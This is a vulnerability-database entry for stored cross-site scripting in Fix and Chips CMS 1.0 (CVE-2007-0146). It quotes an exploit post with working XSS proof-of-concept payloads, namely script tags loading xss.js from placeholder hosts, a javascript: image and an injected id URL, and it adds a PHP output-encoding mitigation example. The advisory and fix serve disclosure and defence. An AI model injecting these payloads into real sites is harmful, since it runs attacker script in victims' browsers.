Multiple Cross-Site Scripting Vulnerabilities in Fix and Chips CMS

Vulnerability ID: 1192194    Vulnerability type: Cross-site scripting
Published: 2007-01-09    Updated: 2007-01-09
CVE ID: CVE-2007-0146    CNNVD-ID: CNNVD-200701-095
Platform: N/A    CVSS score: 6.0
|Vulnerability source
https://www.securityfocus.com/bid/82031
https://cxsecurity.com/issue/WLB-2007010035
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-095
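|Vulnerability details
Fix and Chips CMS 1.0 contains multiple cross-site scripting vulnerabilities. A remote attacker can inject arbitrary web script or HTML via (1) the id parameter in (a) delete-announce.php; (2) the Announcement form field in (b) staff.php; the (3) Customer Name, (4) Company Name, (5) Street, (6) Address 2, (7) Town/City, (8) Post Code, (9) Telephone Number, (10) E-mail Address and (11) Website Address form fields in (c) new_customer.php; and unspecified fields in (d) search.php and (e) client-results.php.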
|Exploit
Fix & Chips CMS v1.0

http://software.fixnchipsit.com/

Vulnerable files:

staff.php
delete-announce.php
new-customer.php
search.php
client-results.php
--------------------------------------------

staff.php XSS
User input in the Announcement box isn't properly sanitized before being generated.

A few PoCs that work:

<SCRIPT SRC=http://somesite.com/xss.js></SCRIPT>

<IMG SRC=javascript:alert("XSS")>

----------------------------------------------

delete-announce.php XSS

http://www.example.com/delete-announce.php?id=<SCRIPT%20SRC=example.com/xss.js></SCRIPT>

-------------------------------------------------
new-customer.php

User input in all of the input boxes when adding a new customer isn't sanitized. For a PoC in any input box when adding a new client put:

<SCRIPT SRC=http://example.com/xss.js></SCRIPT>

Because of the above, all malicious user input that is listed on the pages search.php and client-results.php will execute as well.

------------------------------------------------

- Luny
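
The mitigation for the issues reported above, as an added example that is not part of the original advisory or the CMS source: encode stored values when they are written into HTML, accept only an integer for an id parameter like the one in delete-announce.php, and allow only http(s) URLs into a link for the Website Address field. All function names and array keys are hypothetical, and the sample record is constructed.

```php
<?php
declare(strict_types=1);
// Added example; names and field keys are hypothetical, not taken from Fix & Chips CMS.

/** Encode a stored value for an HTML text node or a quoted attribute. */
function e(?string $value): string
{
    return htmlspecialchars($value ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** id parameter: accept a positive integer only, otherwise return null. */
function announcement_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Website Address field: only http(s) URLs may be emitted into an href. */
function safe_href(?string $url): ?string
{
    $url = trim($url ?? '');
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

/** Render one customer row as a results page would, encoding at output time. */
function render_customer_row(array $c): string
{
    $href = safe_href($c['website'] ?? null);
    $site = $href === null ? '' : '<a href="' . e($href) . '" rel="noopener">' . e($href) . '</a>';
    return '<tr><td>' . e($c['name'] ?? '') . '</td><td>' . e($c['company'] ?? '')
         . '</td><td>' . $site . '</td></tr>';
}

// Constructed sample record that reuses the markup quoted in the advisory.
$row = [
    'name'    => '<SCRIPT SRC=http://example.com/xss.js></SCRIPT>',
    'company' => 'Example "Ltd"',
    'website' => 'javascript:alert("XSS")',
];
echo render_customer_row($row), PHP_EOL;          // markup is emitted as inert text
var_dump(announcement_id('<SCRIPT SRC=x></SCRIPT>')); // not an integer
var_dump(announcement_id('42'));
```

Encoding at output time covers search.php and client-results.php style listings as well, since records stored before any input filter was added are still rendered as text.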
|Affected products
Fix And Chips Computer Services Fix And Chips Cms 1.0
|References

Source: BUGTRAQ
Name: 20070106 Fix & Chips CMS v1.0
Link: http://www.securityfocus.com/archive/1/archive/1/456121/100/0/threaded
Source: VUPEN
Name: ADV-2007-0081
Link: http://www.frsirt.com/english/advisories/2007/0081
Source: SECUNIA
Name: 23625
Link: http://secunia.com/advisories/23625
Source: XF
Name: fixandchips-multiple-scripts-xss(31319)
Link: http://xforce.iss.net/xforce/xfdb/31319
Source: OSVDB
Name: 32650
Link: http://www.osvdb.org/32650
Source: OSVDB
Name: 32649
Link: http://www.osvdb.org/32649
Source: OSVDB
Name: 32648
Link: http://www.osvdb.org/32648
Source: OSVDB
Name: 32647
Link: http://www.osvdb.org/32647
Source: OSVDB
Name: 32646
Link: http://www.osvdb.org/32646
Source: SREASON
Name: 2119
Link: http://securityreason.com/securityalert/2119